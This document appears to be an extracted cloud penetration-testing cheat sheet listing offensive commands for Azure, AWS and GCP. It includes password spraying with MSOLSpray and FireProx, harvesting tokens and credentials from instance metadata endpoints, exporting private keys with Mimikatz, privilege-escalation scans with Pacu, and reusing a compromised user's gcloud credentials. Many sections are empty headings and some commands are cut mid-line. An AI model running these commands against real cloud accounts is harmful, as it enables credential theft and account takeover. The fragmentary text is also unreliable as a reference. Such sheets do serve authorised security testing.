Cloud Pentesting Cheatsheet
Cloud Pentesting Cheatsheet
Cloud Pentesting Cheatsheet
Az PowerShell Module
Import-Module Az
Authentication
Connect-AzAccount
$credential = Get-Credential
Connect-AzAccount -Credential $credential
Account Information
Get-AzContext -ListAvailable
List subscriptions
Get-AzSubscription
Choose a subscription
Get-AzRoleAssignment
Get-AzResource
Get-AzResourceGroup
Get-AzStorageAccount
Get-AzAdApplication
Get-AzWebApp
Individual databases can be listed with information retrieved from the previous command
Runbooks
Get-AzAutomationAccount
Get-AzAutomationRunbook -AutomationAccountName <AutomationAccountName> -
ResourceGroupName <ResourceGroupName>
Virtual Machines
Get-AzVM
$vm = Get-AzVM -Name "VM Name"
$vm.OSProfile
Run commands on VMs
Networking
Get-AzVirtualNetwork
Get-AzPublicIpAddress
Get-AzExpressRouteCircuit
Backdoors
Authentication
Connect-MsolService
$credential = Get-Credential
Connect-MsolService -Credential $credential
Get-MSolCompanyInformation
Get-MSolUser -All
Get-MSolGroup -All
Get-MSolUser –All | fl
Az CLI Tool
Authentication
az login
List out any key vault resources the current account can view
With contributor level access you can give yourself the right permissions to obtain secrets.
http://169.254.169.254/metadata
GET 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-
01&resource=https://management.azure.com/' HTTP/1.1 Metadata: true
MicroBurst
https://github.com/NetSPI/MicroBurst
Get-AzPasswords -ExportCerts Y
Get-AzPasswords
Get-AzACR
PowerZure
https://github.com/hausec/PowerZure
ROADTools
Framework to interact with Azure AD
https://github.com/dirkjanm/ROADtools
Stormspotter
https://github.com/Azure/Stormspotter
MSOLSpray
https://github.com/dafthack
Import-Module .\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\userlist.txt -Password Spring2020
Authentication
Set AWS programmatic keys for authentication (use --profile= for a new profile)
aws configure
aws s3 ls s3://<bucketname>/
aws s3 ls
Virtual Machines
List WebApps
aws ec2 describe-security-groups --group-ids <VPC Security Group ID> --region <region>
Serverless
Networking
Backdoors
http://169.254.169.254/latest/meta-data
Additional IAM creds possibly available here
Can potentially hit it externally if a proxy service (like Nginx) is being hosted in AWS and
misconfigured
IMDS Version 2 has some protections but these commands can be used to access it
WeirdAAL
https://github.com/carnal0wnage/weirdAAL
Run recon against all AWS services to enumerate access for a set of keys
Pacu
https://github.com/RhinoSecurityLabs/pacu
Install Pacu
sudo apt-get install python3-pip
git clone https://github.com/RhinoSecurityLabs/pacu
cd pacu
sudo bash install.sh
run iam__detect_honeytokens
run iam__enum_users_roles_policies_groups
run iam__enum_permissions
whoami
run iam__privesc_scan
Authentication
Account Information
List organizations
List projects
Virtual Machines
gcloud beta compute ssh --zone "<region>" "<instance name>" --project "<project name>"
curl http://metadata.google.internal/computeMetadata/v1/instance/service-
accounts/default/scopes -H 'Metadata-Flavor:Google’
Storage Buckets
gsutil cp gs://bucketid/item ~/
List WebApps
gsutil cp gs://bucket-name/folder/ .
Networking
List subnets
Containers
GCP Kubernetes config file ~/.kube/config gets generated when you are authenticated with
gcloud and run:
If successful and the user has the correct permission the Kubernetes command below can be
used to get cluster info:
kubectl cluster-info
Serverless
GCP functions log analysis – May get useful information from logs associated with GCP
functions
gcloud functions list
gcloud functions describe <function name>
gcloud functions logs read <function name> --limit <number of lines>
Copy gcloud dir to your own home directory to auth as the compromised user
curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true&alt=text" -H
"Metadata-Flavor: Google"
ScoutSuite
Multi-cloud security auditing tool
Install ScoutSuite
To run as root
sudo apt-get install virtualenv
sudo su
virtualenv -p python3 venv
source venv/bin/activate
pip install scoutsuite
or if installed...
Cloud_Enum
Tool to search for public resources in AWS, Azure, and GCP
https://github.com/initstring/cloud_enum
GitLeaks
Search repositories for secrets
https://github.com/zricethezav/gitleaks
TruffleHog - https://github.com/dxa4481/truffleHog
Shhgit - https://github.com/eth0izzle/shhgit
Gitrob - https://github.com/michenriksen/gitrob
Mimikatz
Export Non-Exportable Private Keys From Web Server
mimikatz# crypto::capi
mimikatz# privilege::debug
mimikatz# crypto::cng
mimikatz# crypto::certificates /systemstore:local_machine /store:my /export
~/.bash_history
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_hist
ory.txt
PowerView
https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon Find on-prem ADConnect
account name and server
Get-NetUser -Filter "(samAccountName=MSOL_*)" |Select-Object name,description | fl
FireProx
Password Spraying Azure/O365 while randomizing IPs with FireProx
Install
Launch FireProx
ip2Provider
Check a list of IP addresses against cloud provider IP space
https://github.com/oldrho/ip2provider
SadCloud - https://github.com/nccgroup/sadcloud
Huge thanks to all the cloud pentesting blog/book authors & open source developers!
Lee Kagan @invokethreatguy & Lares - Blog | Resources | Lares Consulting, LLC
Oddvar Moe @Oddvarmoe & TrustedSec - Cybersecurity Education from the Experts |
TrustedSec Blog Posts